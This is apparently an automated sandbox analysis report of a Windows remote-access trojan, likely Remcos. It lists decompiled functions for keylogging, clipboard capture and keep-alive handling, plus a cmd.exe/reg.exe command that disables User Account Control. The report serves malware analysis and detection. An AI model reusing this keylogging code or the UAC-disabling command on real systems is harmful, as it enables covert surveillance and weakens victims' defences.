                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Init_thread_footer__onexit
                    • String ID: [End of clipboard]$[Text copied to clipboard]$\G$\G
                    • API String ID: 1881088180-3154287282
                    • Opcode ID: 1fb837145d5a87a3615e1a1a04cbcef16ea493cf6afd733430621596bbf13c4a
                    • Instruction ID: 5ca14ce5763221c043eb114a828d929c188f139d8819ba148b63206897385422
                    • Opcode Fuzzy Hash: 1fb837145d5a87a3615e1a1a04cbcef16ea493cf6afd733430621596bbf13c4a
                    • Instruction Fuzzy Hash: 802191319002045ACB05FB76D892AEDB375EF54318F10043FE506772E2EF785D4A8A8D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E0040AFD9(void* __ebx, void* __ecx, void* __eflags, char _a4) {
                    				struct _SYSTEMTIME _v20;
                    				char _v44;
                    				char _v68;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				WCHAR* _t28;
                    				void* _t61;
                    				void* _t62;
                    				void* _t64;
                    				void* _t65;
                    				void* _t66;
                    
                    				_t66 = __eflags;
                    				_t61 = __ecx;
                    				GetLocalTime( &_v20);
                    				E00401F13( &_a4, _t21, _t62, E00403014(__ebx,  &_v44, E0040B7F1( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t64,  &_a4), _t61, _t64, _t66, L"]\r\n"));
                    				E00401F09();
                    				E00401F09();
                    				_push(0x64 + E0040247C() * 2);
                    				_t28 = E0043B715( &_a4);
                    				_push(_v20.wSecond & 0x0000ffff);
                    				_push(_v20.wMinute & 0x0000ffff);
                    				_push(_v20.wHour & 0x0000ffff);
                    				_push(_v20.wDay & 0x0000ffff);
                    				_push(_v20.wMonth & 0x0000ffff);
                    				wsprintfW(_t28, E00401F04( &_a4));
                    				E0040417E(__ebx, _t65, _t21, _t64, _t28);
                    				E0040A4AB(_t61, _v20.wYear & 0x0000ffff);
                    				L0043B710(_t28);
                    				return E00401F09();
                    			}















                    0x0040afd9
                    0x0040afe4
                    0x0040afe7
                    0x0040b013
                    0x0040b01b
                    0x0040b023
                    0x0040b037
                    0x0040b038
                    0x0040b048
                    0x0040b04d
                    0x0040b052
                    0x0040b057
                    0x0040b05c
                    0x0040b068
                    0x0040b073
                    0x0040b07a
                    0x0040b080
                    0x0040b093

                    APIs
                    • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040AFE7
                    • wsprintfW.USER32 ref: 0040B068
                      • Part of subcall function 0040A4AB: SetEvent.KERNEL32(?,?,00000000,0040B07F,00000000), ref: 0040A4D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: EventLocalTimewsprintf
                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                    • API String ID: 1497725170-248792730
                    • Opcode ID: fdc9a98df1037cc30e2bf944cb7f33ad3bd0091d7b9f28e1baaf8c2ba1882218
                    • Instruction ID: 88142952cb24ae36c01518841ce1901f5359d05e1e27d3e96f96d5e574883280
                    • Opcode Fuzzy Hash: fdc9a98df1037cc30e2bf944cb7f33ad3bd0091d7b9f28e1baaf8c2ba1882218
                    • Instruction Fuzzy Hash: 8D116072500118AAC708AB66EC958FE77B8EE48355F10012FF506A61D1FF7C9A46C6AC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0040A4EA(void* __ecx, void* __edx) {
                    				void* __ebx;
                    				signed int _t8;
                    				int _t9;
                    				long _t14;
                    				void* _t22;
                    				void* _t23;
                    				void* _t24;
                    				void* _t25;
                    				void* _t30;
                    
                    				_t22 = __edx;
                    				_t8 =  *0x474188; // 0x0
                    				_t9 = _t8 |  *0x47418c;
                    				_t24 = __ecx;
                    				if(_t9 != 0) {
                    					 *((char*)(__ecx + 0x39)) = 0;
                    					do {
                    						_t9 = CreateFileW(E00401F04(0x474140), 0x80000000, 7, 0, 3, 0x80, 0);
                    						_t23 = _t9;
                    						if(_t23 == 0xffffffff) {
                    							 *((char*)(_t24 + 0x39)) = 0;
                    						} else {
                    							_t14 = GetFileSize(_t23, 0);
                    							_t30 = 0 -  *0x47418c; // 0x0
                    							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x474188)) {
                    								 *((char*)(_t24 + 0x39)) = 1;
                    								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
                    									E0040AF51(0, _t24, _t22);
                    								}
                    								Sleep(0x2710);
                    							}
                    							_t9 = CloseHandle(_t23);
                    						}
                    					} while ( *((char*)(_t24 + 0x39)) == 1);
                    					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
                    						_t35 =  *0x474124 - 1;
                    						if( *0x474124 == 1) {
                    							E00408F83(0, _t25 - 0x18, _t22, _t35, _t24 + 0x68);
                    							return E0040A0A0(_t24, _t22);
                    						}
                    					}
                    				}
                    				return _t9;
                    			}












                    0x0040a4ea
                    0x0040a4ea
                    0x0040a4ef
                    0x0040a4f8
                    0x0040a4fa
                    0x0040a502
                    0x0040a505
                    0x0040a520
                    0x0040a526
                    0x0040a52b
                    0x0040a56b
                    0x0040a52d
                    0x0040a52f
                    0x0040a535
                    0x0040a53b
                    0x0040a547
                    0x0040a54e
                    0x0040a552
                    0x0040a552
                    0x0040a55c
                    0x0040a55c
                    0x0040a563
                    0x0040a563
                    0x0040a56e
                    0x0040a577
                    0x0040a579
                    0x0040a580
                    0x0040a58b
                    0x00000000
                    0x0040a592
                    0x0040a580
                    0x0040a577
                    0x0040a59a

                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A5C2), ref: 0040A520
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A5C2), ref: 0040A52F
                    • Sleep.KERNEL32(00002710,?,?,?,0040A5C2), ref: 0040A55C
                    • CloseHandle.KERNEL32(00000000,?,?,?,0040A5C2), ref: 0040A563
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSizeSleep
                    • String ID: @AG
                    • API String ID: 1958988193-2382495397
                    • Opcode ID: dc124618c60ce761d205ef349d8f93692f0215b14c702f0659c3e7ab93453324
                    • Instruction ID: 03697ee7adbbae07eb04f55f0f94d44c98b0935c33367d25e999d75b520e8a67
                    • Opcode Fuzzy Hash: dc124618c60ce761d205ef349d8f93692f0215b14c702f0659c3e7ab93453324
                    • Instruction Fuzzy Hash: 0B11EB702407407AD621B7349C89A2E3F5EBB99325F44043EF186676D2CB3898E4825F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 70%
                    			E0041CF2D() {
                    				char _v20;
                    				struct _WNDCLASSEXA _v68;
                    				void* __edi;
                    				struct HWND__* _t20;
                    				void* _t23;
                    
                    				E004368A0(_t23,  &(_v68.style), 0, 0x2c);
                    				_v68.cbSize = 0x30;
                    				_v68.style = 0;
                    				_v68.lpfnWndProc = E0041CFAD;
                    				_v68.cbClsExtra = 0;
                    				asm("movsd");
                    				_v68.lpszClassName =  &_v20;
                    				_v68.cbWndExtra = 0;
                    				asm("movsd");
                    				_v68.lpszMenuName = 0;
                    				asm("movsd");
                    				asm("movsw");
                    				asm("movsb");
                    				if(RegisterClassExA( &_v68) == 0) {
                    					L3:
                    					return 0;
                    				}
                    				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
                    				if(_t20 == 0) {
                    					GetLastError();
                    					goto L3;
                    				}
                    				return _t20;
                    			}








                    0x0041cf3f
                    0x0041cf49
                    0x0041cf53
                    0x0041cf59
                    0x0041cf63
                    0x0041cf66
                    0x0041cf67
                    0x0041cf6e
                    0x0041cf71
                    0x0041cf72
                    0x0041cf75
                    0x0041cf76
                    0x0041cf78
                    0x0041cf82
                    0x0041cfa4
                    0x00000000
                    0x0041cfa4
                    0x0041cf94
                    0x0041cf9c
                    0x0041cf9e
                    0x00000000
                    0x0041cf9e
                    0x0041cfac

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ClassCreateErrorLastRegisterWindow
                    • String ID: 0$MsgWindowClass
                    • API String ID: 2877667751-2410386613
                    • Opcode ID: 0b16865d8eed1e100c00abb431862a8a7cc8eb7660a05eb4462b3b5aeb4c8cad
                    • Instruction ID: 764029d3eaea2a2d29105b937f06772c80d62a86f86cee5eb12b194d62ac4832
                    • Opcode Fuzzy Hash: 0b16865d8eed1e100c00abb431862a8a7cc8eb7660a05eb4462b3b5aeb4c8cad
                    • Instruction Fuzzy Hash: FD0125B1D0021DAFDB00DF95DCC5DEFBBBCEB48365F40052AF914A6240EB7589458AA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040767C() {
                    				struct _PROCESS_INFORMATION _v20;
                    				struct _STARTUPINFOA _v92;
                    				void* __edi;
                    				long _t18;
                    
                    				_t18 = 0x44;
                    				E004368A0(0,  &_v92, 0, _t18);
                    				_v92.cb = _t18;
                    				E004368A0(0,  &_v20, 0, 0x10);
                    				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
                    				CloseHandle(_v20);
                    				return CloseHandle(_v20.hThread);
                    			}







                    0x00407686
                    0x0040768f
                    0x00407699
                    0x0040769e
                    0x004076c2
                    0x004076d1
                    0x004076dd

                    APIs
                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004076C2
                    • CloseHandle.KERNEL32(?), ref: 004076D1
                    • CloseHandle.KERNEL32(?), ref: 004076D6
                    Strings
                    • C:\Windows\System32\cmd.exe, xrefs: 004076BD
                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004076B8
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreateProcess
                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                    • API String ID: 2922976086-4183131282
                    • Opcode ID: 97645a390b89c927d640708137d72f511f6979b14a018d75fca86a5a826e9845
                    • Instruction ID: 80365df6efdf52041f973b7a6b9d006bbfade68c5a22d9854336981192102b21
                    • Opcode Fuzzy Hash: 97645a390b89c927d640708137d72f511f6979b14a018d75fca86a5a826e9845
                    • Instruction Fuzzy Hash: 5CF06D72D0029D7ACB20ABD6DC0AFDF7F3CEBC5B21F00006ABA04A6041DA745000CAB9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00442CCB,00000003,?,00442C6B,00000003,0046D8E8,0000000C,00442DC2,00000003,00000002), ref: 00442D3A
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00442D4D
                    • FreeLibrary.KERNEL32(00000000,?,?,?,00442CCB,00000003,?,00442C6B,00000003,0046D8E8,0000000C,00442DC2,00000003,00000002,00000000), ref: 00442D70
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 80825cac79236cd2c7ebff55ff477812a2dc1bacae2f4b375712f695177e775c
                    • Instruction ID: d40aae6c794ece6698a7fd7b4d30664add7a0b809ffa1a82e9e0171df2b8b193
                    • Opcode Fuzzy Hash: 80825cac79236cd2c7ebff55ff477812a2dc1bacae2f4b375712f695177e775c
                    • Instruction Fuzzy Hash: 74F04470901708BBDB119FA1DC49B9EBFB8EF44756F5080AAFC05A2251DF789A44CA98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E004050E4(void* __ecx, void* __ebp, char _a4) {
                    				void* _t17;
                    				void* _t21;
                    				void* _t22;
                    				void* _t23;
                    				void* _t25;
                    
                    				_t23 = __ecx;
                    				if( *((char*)(__ecx + 0x5c)) == 0) {
                    					return 0;
                    				}
                    				if(_a4 == 0) {
                    					_t26 = _t25 - 0x18;
                    					E00402093(_t17, _t25 - 0x18, _t21, __ebp, "KeepAlive             | Disabled");
                    					E00402093(_t17, _t26 - 0x18, _t21, __ebp, "!");
                    					E0041AF84(_t17, _t22);
                    				}
                    				 *(_t23 + 0x64) = CreateEventA(0, 0, 0, 0);
                    				SetEvent( *(_t23 + 0x60));
                    				WaitForSingleObject( *(_t23 + 0x64), 0xffffffff);
                    				CloseHandle( *(_t23 + 0x64));
                    				return 1;
                    			}








                    0x004050e5
                    0x004050eb
                    0x00000000
                    0x0040514a
                    0x004050f2
                    0x004050f4
                    0x004050fe
                    0x0040510d
                    0x00405112
                    0x00405117
                    0x00405129
                    0x0040512c
                    0x00405137
                    0x00405140
                    0x00000000

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE0,00404E7A,00000001,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000), ref: 00405120
                    • SetEvent.KERNEL32(?,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000), ref: 0040512C
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000), ref: 00405137
                    • CloseHandle.KERNEL32(?,?,00000000,00473EE0,00404CA8,00000000,00000000,00000000,00000000), ref: 00405140
                      • Part of subcall function 0041AF84: GetLocalTime.KERNEL32(00000000), ref: 0041AF9E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                    • String ID: KeepAlive | Disabled
                    • API String ID: 2993684571-305739064
                    • Opcode ID: 53f44e974da05e48f24787b097b12a72829f55b1105c3281283b0a02479c17b0
                    • Instruction ID: 5fe5449574b6babd83b199a5b49f48bc68be24283d5d4383222260440178fbe4
                    • Opcode Fuzzy Hash: 53f44e974da05e48f24787b097b12a72829f55b1105c3281283b0a02479c17b0
                    • Instruction Fuzzy Hash: 6FF09071905B107FDB103B758D0AA6F7F94AB02315F0005AEF982A16E2DD78C8518F9B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E0041A855(WCHAR* __ecx) {
                    				void* __edi;
                    				void* _t7;
                    				void* _t11;
                    				void* _t12;
                    				WCHAR* _t14;
                    				void* _t16;
                    				void* _t17;
                    
                    				_t18 = _t17 - 0x18;
                    				_t14 = __ecx;
                    				E00402093(_t7, _t17 - 0x18, _t11, _t16, "Alarm triggered");
                    				E00402093(_t7, _t18 - 0x18, _t11, _t16, "!");
                    				E0041AF84(_t7, _t12);
                    				PlaySoundW(_t14, GetModuleHandleA(0), 0x20009);
                    				Sleep(0x2710);
                    				return PlaySoundW(0, 0, 0);
                    			}










                    0x0041a857
                    0x0041a85a
                    0x0041a863
                    0x0041a872
                    0x0041a877
                    0x0041a895
                    0x0041a89c
                    0x0041a8a9

                    APIs
                      • Part of subcall function 0041AF84: GetLocalTime.KERNEL32(00000000), ref: 0041AF9E
                    • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041A887
                    • PlaySoundW.WINMM(00000000,00000000), ref: 0041A895
                    • Sleep.KERNEL32(00002710), ref: 0041A89C
                    • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041A8A5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: PlaySound$HandleLocalModuleSleepTime
                    • String ID: Alarm triggered
                    • API String ID: 614609389-2816303416
                    • Opcode ID: 5218da801ff92e0fdd794b83a108b0aa80872577be3c1cd2c84dd2e85fff6f9e
                    • Instruction ID: a97a13cd270f1621b63d938a52df47679311c33b6a572334b67861bed11a1a4e
                    • Opcode Fuzzy Hash: 5218da801ff92e0fdd794b83a108b0aa80872577be3c1cd2c84dd2e85fff6f9e
                    • Instruction Fuzzy Hash: 1FE01226A41220379510337B6D0FD6F2E28CBC3B55B4100BEFB0566192AD54085196FB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 54%
                    			E0041C776() {
                    				struct _CONSOLE_SCREEN_BUFFER_INFO _v28;
                    				void* _t9;
                    				void* _t12;
                    
                    				_t9 = GetStdHandle(0xfffffff5);
                    				GetConsoleScreenBufferInfo(_t9,  &_v28);
                    				SetConsoleTextAttribute(_t9, 0xc);
                    				_push("\n\t ______                              \n\t(_____ \\                             \n\t _____) )_____ ____   ____ ___   ___ \n\t|  __  /| ___ |    \\ / ___) _ \\ /___)\n\t| |  \\ \\| ____| | | ( (__| |_| |___ |\n\t|_|   |_|_____)_|_|_|\\____)___/(___/ \n");
                    				E00407127(_t12);
                    				return SetConsoleTextAttribute(_t9, _v28.wAttributes & 0x0000ffff);
                    			}






                    0x0041c786
                    0x0041c78d
                    0x0041c79a
                    0x0041c7a0
                    0x0041c7a5
                    0x0041c7b8

                    APIs
                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041C80B), ref: 0041C780
                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041C80B), ref: 0041C78D
                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041C80B), ref: 0041C79A
                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041C80B), ref: 0041C7AD
                    Strings
                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041C7A0
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                    • API String ID: 3024135584-2418719853
                    • Opcode ID: b0fb43e8809191aa73e99346b796ed03d22fbdecda89e1e53dc3eaf68301a2e0
                    • Instruction ID: 033a1d85504b599371bcb05913ad3a663c1eceb3d3f863126c44dc89991bb978
                    • Opcode Fuzzy Hash: b0fb43e8809191aa73e99346b796ed03d22fbdecda89e1e53dc3eaf68301a2e0
                    • Instruction Fuzzy Hash: 59E048725047486BD21037F5AC4ECAB7B6CE745613B10062AFA11A12D3DE74985587B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00440D7A(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				char _v16;
                    				int _v20;
                    				int _v24;
                    				char* _v28;
                    				int _v32;
                    				char _v36;
                    				intOrPtr _v44;
                    				char _v48;
                    				signed int _t59;
                    				char* _t61;
                    				intOrPtr _t63;
                    				int _t64;
                    				intOrPtr* _t65;
                    				signed int _t68;
                    				intOrPtr* _t71;
                    				short* _t73;
                    				int _t74;
                    				int _t76;
                    				char _t78;
                    				short* _t83;
                    				short _t85;
                    				int _t91;
                    				int _t93;
                    				char* _t98;
                    				int _t103;
                    				char* _t105;
                    				void* _t106;
                    				intOrPtr _t108;
                    				intOrPtr _t109;
                    				int _t110;
                    				short* _t113;
                    				int _t114;
                    				int _t116;
                    				signed int _t117;
                    
                    				_t106 = __edx;
                    				_t59 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t59 ^ _t117;
                    				_t61 = _a4;
                    				_t91 = _a12;
                    				_t116 = 0;
                    				_v28 = _t61;
                    				_v20 = 0;
                    				_t113 = _a8;
                    				_v24 = _t113;
                    				if(_t61 == 0 || _t91 != 0) {
                    					if(_t113 != 0) {
                    						E0043A1C7(_t91,  &_v48, _t106, _a16);
                    						_t98 = _v28;
                    						if(_t98 == 0) {
                    							_t63 = _v44;
                    							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
                    								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
                    								if(_t64 == 0 || _v20 != _t116) {
                    									L55:
                    									_t65 = E0043FFBD();
                    									_t114 = _t113 | 0xffffffff;
                    									 *_t65 = 0x2a;
                    									goto L56;
                    								} else {
                    									_t53 = _t64 - 1; // -1
                    									_t114 = _t53;
                    									L56:
                    									if(_v36 != 0) {
                    										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
                    									}
                    									goto L59;
                    								}
                    							}
                    							_t68 =  *_t113 & 0x0000ffff;
                    							if(_t68 == 0) {
                    								L51:
                    								_t114 = _t116;
                    								goto L56;
                    							}
                    							while(_t68 <= 0xff) {
                    								_t113 =  &(_t113[1]);
                    								_t116 = _t116 + 1;
                    								_t68 =  *_t113 & 0x0000ffff;
                    								if(_t68 != 0) {
                    									continue;
                    								}
                    								goto L51;
                    							}
                    							goto L55;
                    						}
                    						_t108 = _v44;
                    						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
                    							if( *((intOrPtr*)(_t108 + 4)) != 1) {
                    								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
                    								if(_t114 == 0) {
                    									if(_v20 != _t116 || GetLastError() != 0x7a) {
                    										L45:
                    										_t71 = E0043FFBD();
                    										_t116 = _t116 | 0xffffffff;
                    										 *_t71 = 0x2a;
                    										goto L51;
                    									} else {
                    										if(_t91 == 0) {
                    											goto L56;
                    										}
                    										_t73 = _v24;
                    										while(1) {
                    											_t109 = _v44;
                    											_t103 =  *(_t109 + 4);
                    											if(_t103 > 5) {
                    												_t103 = 5;
                    											}
                    											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
                    											_t93 = _a12;
                    											_t110 = _t74;
                    											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
                    												goto L55;
                    											}
                    											if(_t110 + _t114 > _t93) {
                    												goto L56;
                    											}
                    											_t76 = _t116;
                    											_v32 = _t76;
                    											if(_t110 <= 0) {
                    												L43:
                    												_t73 = _v24 + 2;
                    												_v24 = _t73;
                    												if(_t114 < _t93) {
                    													continue;
                    												}
                    												goto L56;
                    											}
                    											_t105 = _v28;
                    											while(1) {
                    												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
                    												 *((char*)(_t105 + _t114)) = _t78;
                    												if(_t78 == 0) {
                    													goto L56;
                    												}
                    												_t76 = _v32 + 1;
                    												_t114 = _t114 + 1;
                    												_v32 = _t76;
                    												if(_t76 < _t110) {
                    													continue;
                    												}
                    												goto L43;
                    											}
                    											goto L56;
                    										}
                    										goto L55;
                    									}
                    								}
                    								if(_v20 != _t116) {
                    									goto L45;
                    								}
                    								_t28 = _t114 - 1; // -1
                    								_t116 = _t28;
                    								goto L51;
                    							}
                    							if(_t91 == 0) {
                    								L21:
                    								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
                    								if(_t116 == 0 || _v20 != 0) {
                    									goto L45;
                    								} else {
                    									if(_v28[_t116 - 1] == 0) {
                    										_t116 = _t116 - 1;
                    									}
                    									goto L51;
                    								}
                    							}
                    							_t83 = _t113;
                    							_v24 = _t91;
                    							while( *_t83 != _t116) {
                    								_t83 =  &(_t83[1]);
                    								_t16 =  &_v24;
                    								 *_t16 = _v24 - 1;
                    								if( *_t16 != 0) {
                    									continue;
                    								}
                    								break;
                    							}
                    							if(_v24 != _t116 &&  *_t83 == _t116) {
                    								_t91 = (_t83 - _t113 >> 1) + 1;
                    							}
                    							goto L21;
                    						}
                    						if(_t91 == 0) {
                    							goto L51;
                    						}
                    						while( *_t113 <= 0xff) {
                    							_t98[_t116] =  *_t113;
                    							_t85 =  *_t113;
                    							_t113 =  &(_t113[1]);
                    							if(_t85 == 0) {
                    								goto L51;
                    							}
                    							_t116 = _t116 + 1;
                    							if(_t116 < _t91) {
                    								continue;
                    							}
                    							goto L51;
                    						}
                    						goto L45;
                    					}
                    					 *((intOrPtr*)(E0043FFBD())) = 0x16;
                    					E0043B6B0();
                    					goto L59;
                    				} else {
                    					L59:
                    					return E004349BB(_v8 ^ _t117);
                    				}
                    			}






































                    0x00440d7a
                    0x00440d82
                    0x00440d89
                    0x00440d8c
                    0x00440d90
                    0x00440d94
                    0x00440d96
                    0x00440d99
                    0x00440d9d
                    0x00440da0
                    0x00440da5
                    0x00440db4
                    0x00440dd4
                    0x00440dd9
                    0x00440dde
                    0x00440f7b
                    0x00440f84
                    0x00440fb6
                    0x00440fbe
                    0x00440fca
                    0x00440fca
                    0x00440fcf
                    0x00440fd2
                    0x00000000
                    0x00440fc5
                    0x00440fc5
                    0x00440fc5
                    0x00440fd8
                    0x00440fdc
                    0x00440fe1
                    0x00440fe1
                    0x00000000
                    0x00440fe8
                    0x00440fbe
                    0x00440f86
                    0x00440f8c
                    0x00440fa4
                    0x00440fa4
                    0x00000000
                    0x00440fa4
                    0x00440f93
                    0x00440f98
                    0x00440f9b
                    0x00440f9c
                    0x00440fa2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00440fa2
                    0x00000000
                    0x00440f93
                    0x00440de4
                    0x00440ded
                    0x00440e27
